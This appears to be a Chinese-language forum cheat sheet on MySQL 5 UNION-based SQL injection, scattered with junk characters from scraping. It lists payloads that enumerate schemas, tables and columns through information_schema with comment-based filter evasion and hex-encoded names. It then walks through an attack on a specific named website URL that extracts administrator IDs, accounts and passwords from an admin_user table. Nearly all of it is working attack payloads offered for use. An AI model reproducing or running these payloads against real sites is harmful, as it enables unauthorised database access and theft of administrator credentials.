查库
1 R Z9 d8 ?# E# F0 t" cid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
1 k2 @$ D- i" \+ K1 J$ I k1 y1 C
查表
, r8 u9 Y1 W9 `/ ^" g2 N5 pid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
+ W$ G( g+ J! d$ a4 W3 R% Y2 h# ^ m& x/ L/ s
查段
; W" {- Y8 v! Y% e& f5 U! C
! @/ f+ T! f0 \9 p( e2 G( `; Wid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
0 f" U0 K& ?! ?1 W Q' ]
9 K1 a {; O3 i+ m. w/ n; t( S$ U2 y k; [" d6 n3 u
mysql5高级注入方法暴表
例子如下:
. a" t0 B7 ~3 ?% A: b+ L0 j e1 \. H; @ {9 f% ^& A
1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
这样爆到第4个时出现了admin_user表。
/ y' A- T! c' {% i6 W' b' Q( J x' n0 j1 y2 G. S2 c& V
2.暴字段
# y0 X) B4 M% u& ^http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*" |! o# s9 ^: Q; W5 Q+ e
+ t$ v* A* P, f! C4 o$ t
3.爆密码
# b1 C, x, M6 p T: ]" Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
' N( ?1 x% x0 }; ]+ E/ Q
q/ ~7 A6 T4 o$ Q* m4 K6 t# N
7 N, o" Y4 d; p6 C& o- ~: d |